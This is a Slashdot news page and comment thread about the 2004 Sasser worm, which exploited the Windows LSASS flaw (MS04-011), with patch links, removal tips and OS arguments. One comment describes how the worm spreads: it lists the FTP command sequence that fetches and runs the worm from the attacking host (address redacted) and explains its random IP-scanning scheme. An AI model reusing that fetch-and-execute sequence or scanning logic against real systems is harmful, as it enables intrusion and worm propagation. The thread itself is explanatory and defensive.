New Windows Worm on the Loose 622
Dynamoo writes "The Internet Storm Center has issued a Yellow Alert due to the spread of the Sasser worm exploiting Windows 2000 and XP machines through a documented flaw in the Local Security Authority Subsystem Service (LSASS) as described in Microsoft Bulletin MS04-011. Initial analysis seems to indicate classic Blaster-style worm behaviour. Right now I'm just getting a probe every 10 minutes or so on my firewall, but this is bound to escalate sharply as the pool of infected machines grows. Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you? More information at Computer Associates, F-Secure, Symantec and McAfee."
Removal Instructions (Score:5, Informative)
http://www.microsoft.com/security/incident/sasser
Re:I Use X Windows (Score:1, Informative)
its started when you do
# apt-get update && apt-get dist-upgrade
Re:Mutex Trapping (Score:5, Informative)
However, for most other types of spyware I completely agree, that would be an excellent idea for screening running processes.
Re:Mutex Trapping (Score:3, Informative)
Imagine running something complex like a database server. Dialog box fun.
The virus writers will just use something else, like a file, if people tracked by mutex.
Re:Mutex Trapping (Score:5, Informative)
Make it impossible to write to HKLM/software/microsoft/windows/currentversion/ru
Where's Panda? (Score:2, Informative)
Where's Panda [pandasoftware.com] in that list? Personally I prefer Panda over those.
How it works (Score:5, Informative)
It then connects to that shell, and executes the following commands (cleaned up to get past slasdot's junk filter):
open XXX.XXX.XXX.XXX 5554
anonymous
user
bin
get XXXXX_up.exe
bye
XXXXX_up.exe
If successful, those commands ftp to the attacking host, port 5554, and download the actual worm payload. That payload is executed, and the host is fully infected. It then opens an FTP port on port 5554, and begins scanning for vulnerable hosts. Here's the scanning logic, from symantec:
The IP addresses generated by the worm are distributed as follows:
50% are completely random
25% have the same first octet as the IP
address of the infected host
25% have the same first and second octet as the IP address of the infected host.
The worm starts 128 threads that scan randomly-chosen IP addresses. This demands a lot of CPU time and as a result an infected computer may be so slow as to be barely useable.
See:
Re:Mutex Trapping (Score:5, Informative)
Re:Mutex Trapping (Score:5, Informative)
Well, it doesn't protect the registry, but it does pop up a dialog box whenever something tries to add itself to those registry entries..
Re:Mutex Trapping (Score:5, Informative)
Note this only works on NT-based systems (e.g., WinXP)
Re:Mutex Trapping (Score:5, Informative)
Re:Why use windows update? (Score:3, Informative)
Re:I Use X Windows (Score:5, Informative)
some important points (Score:4, Informative)
Sasser generates traffic on TCP ports 445, 5554 and 9996.
The patch for the vulnerability (MS04-011) can be installed through Windows Update or located at the following URL:
http://www.microsoft.com/technet/security/bulle
Bad Link...Here's the Correct One (Score:3, Informative)
Re:I Use X Windows (Score:2, Informative)
Windows XP SP1 Fixed This! (Score:2, Informative)
Re:Oh the irony (Score:2, Informative)
The worm can be removed with McAfee's stinger tool (the Mcafee link has a link to it).
Systems all clear.
Re:Mutex Trapping (Score:2, Informative)
Re:I Use X Windows (Score:5, Informative)
SUS again updates only the OS + Office suite, so that doesn't cut it.
I would certainly prefer to wait a few hours for a test machine to compile a package and then be able to deploy it (binary) to all the machines after testing. It's all in the choice of design, Windows is still at heart a single user operating system, Linux, Unix, BSD, etc are all multi-user operating systems, and it is reflected in installs.
Re:Mutex Trapping (Score:5, Informative)
Access attempts will show up in the event viewer.
Note:use regedt32.exe for Win2000 or eariler. For later versions, regedit.exe does everything (under Edit->Permissions).
windows users never fail to amaze me. (Score:2, Informative)
tested this in my home network (the other half has to have windows) her rights are set by a samba acting as a PDC(i was bored), but basically boils down to a simple matter of her account is considered a "limited account" to her local XP machine...if something needs to be installed or needs admin rights she can explicitly tell it to by using the run as...
i've went from cleaning 50+ items / week off that machine to maybe 3-4 and those are simply cookies being reported as "spyware".
Re:I Use X Windows (Score:4, Informative)
Re:Security Update Dates (Score:3, Informative)
Re:Windows is a joke, but hey, smile. (Score:3, Informative)
In 2k and XP, you can
1- do nothing
2- Ask before downloading and before installing. (only admin users can say yes)
3- download updates automatically, but ask for installation (only admin users can install; they are asked if you they want to go ahead with the install)
4- automatically install at a fixed time (default 2 or 3 am); if a reboot is needed when a user logs in, it asks to reboot.
by default its #3.
in 2k, the option can be changed in the control panel (sp3 or higher needed).
in XP, right click on "my computer", properties, go to the automatic updates tab.
Re:Windows XP SP1 Fixed This! (Score:4, Informative)
Uh... what?
Buffer overflow in certain Active Directory service functions in LSASRV.DLL of the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code by causing long debug entries to be generated for the DCPROMO.LOG log file. [mitre.org] (emphasis mine)
if it blocks your favorite removal/anti-virus site (Score:2, Informative)
i've told soo many others by so now, so i might as well put it on slashdot
Wow! Bushfire! (Score:3, Informative)
Re:I Use X Windows (Score:1, Informative)
Re:Windows update freaking out! (Score:5, Informative)
Re:I Use X Windows (Score:2, Informative)
No, you can't. Linux ignores the suid flag on scripts.
Re:Linux is vunerable too (The anti-anti-windows F (Score:2, Informative)
Re:ah... (Score:2, Informative)
VPN over TCP will give you performance problems. In fact any tunnel device over TCP will give you performance problems. It is the two instances of TCP in the protocol stack that is responsible for most of the problems. Any VPN system built on TCP is broken, it should be build on UDP.